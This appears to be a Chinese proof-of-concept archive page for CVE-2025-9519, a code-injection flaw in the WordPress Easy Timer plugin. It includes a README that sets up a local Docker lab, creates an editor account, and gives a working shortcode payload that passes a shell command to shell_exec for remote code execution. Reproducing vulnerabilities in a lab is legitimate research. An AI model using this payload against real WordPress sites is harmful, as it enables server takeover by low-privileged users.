关联漏洞
标题:
WordPress plugin Easy Timer 代码注入漏洞
(CVE-2025-9519)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Easy Timer 4.2.1及之前版本存在代码注入漏洞,该漏洞源于短码属性限制不足,可能导致远程代码执行。
介绍
# Easy Timer v4.2.1 -
## Prerequisites
* Docker Engine installed
* Docker Compose installed
Refer to the official Docker docs for installation: [Docker Engine Install](https://docs.docker.com/engine/install/)
## 1. Start WordPress with Docker
From your project directory:
```bash
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
```
## 2. Set Up WordPress
1. Navigate to `http://localhost:8000/`
2. Complete the WordPress Setup
3. Navigate to `WordPress Dashboard` → `Plugins` → `Easy Timer` and click `Activate`.
<img width="740" height="325" alt="Screenshot from 2025-10-27 12-52-06" src="https://github.com/user-attachments/assets/91f6d1b6-83c4-4781-b3fa-d5be4d218c3e" />
## 3. Add new user with Editor Privileges
From your project directory execute the following command:
```bash
docker compose run --rm wpcli user create \
editoruser editoruser@example.com \
--role=editor \
--user_pass=P@ssw0rd!
```
(note: replace with your choice of user name, email and password!)
## 4. Create Post
1. Go to `Posts` → `Add New`
2. Insert a `Shortcode block` and enter:
```text
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
```
3. Click **Update → Preview Post** to see the timer execute.
> ⚠️ Note: Ensure you are using a **Shortcode block**, not a Paragraph block, for the shortcode to render properly.
<img width="681" height="278" alt="Screenshot from 2025-10-27 13-36-40" src="https://github.com/user-attachments/assets/00672fbd-9f1e-4a99-9508-f20f91488252" />
---
Congratz you got RCE.
<img width="944" height="620" alt="image" src="https://github.com/user-attachments/assets/2adc719c-4556-4a15-a216-9542a458c8b1" />
## Debugging Tips
* Check running containers:
```bash
sudo docker ps
```
You should see something like:
<img width="1174" height="121" alt="Screenshot from 2025-10-27 12-51-08" src="https://github.com/user-attachments/assets/41599c77-12b2-482e-b349-a79075e45ae7" />
* If shortcodes are **not rendering**:
1. Go to **Appearance → Themes**
2. Activate **Twenty Twenty-Three** (or another default theme).
* If navigating to `http://localhost:8000/` says **Database Not Connected**:
1. Wait a minute or two for the Database to finish setting up
文件快照
[4.0K] /data/pocs/3f14b7235427f3dd73b811decfcab2e3d075b987
├── [1.1K] docker-compose.yml
└── [2.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。